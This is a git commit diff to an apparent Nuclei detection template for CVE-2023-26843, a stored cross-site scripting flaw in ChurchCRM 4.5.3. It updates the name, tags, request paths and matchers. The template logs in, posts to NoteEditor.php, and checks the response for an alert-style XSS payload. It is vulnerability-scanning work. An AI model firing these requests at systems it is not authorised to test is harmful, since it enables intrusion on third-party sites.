updated info,path

2023-06-26 10:45:22 +05:30 · 2023-06-26 10:45:22 +05:30 · 7baa30d4ff
parent 2fd0eb8145
commit 7baa30d4ff
1 changed files with 6 additions and 4 deletions
--- a/http/cves/2023/CVE-2023-26843.yaml
+++ b/http/cves/2023/CVE-2023-26843.yaml
@ -1,7 +1,7 @@
 id: CVE-2023-26843

 info:
-  name: ChurchCRM - Stored Cross Site Scripting
+  name: ChurchCRM 4.5.3 - Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
@ -16,18 +16,19 @@ info:
    cwe-id: CWE-79
  metadata:
    verified: true
-  tags: cve,cve2023,churchCRM,stored,xss,authenticated
+  tags: cve,cve2023,churchcrm,stored,xss,authenticated
+
 http:
  - raw:
      - |
-        POST /churchcrm/session/begin HTTP/1.1
+        POST /session/begin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        User={{username}}&Password={{password}}

      - |
-        POST /churchcrm/NoteEditor.php?FamilyID=1 HTTP/1.1
+        POST /NoteEditor.php?FamilyID=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

@ -39,6 +40,7 @@ http:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
+          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "><img src=x onerror=alert(document.domain)>")'
          - 'contains(body_2, "ChurchCRM")'
        condition: and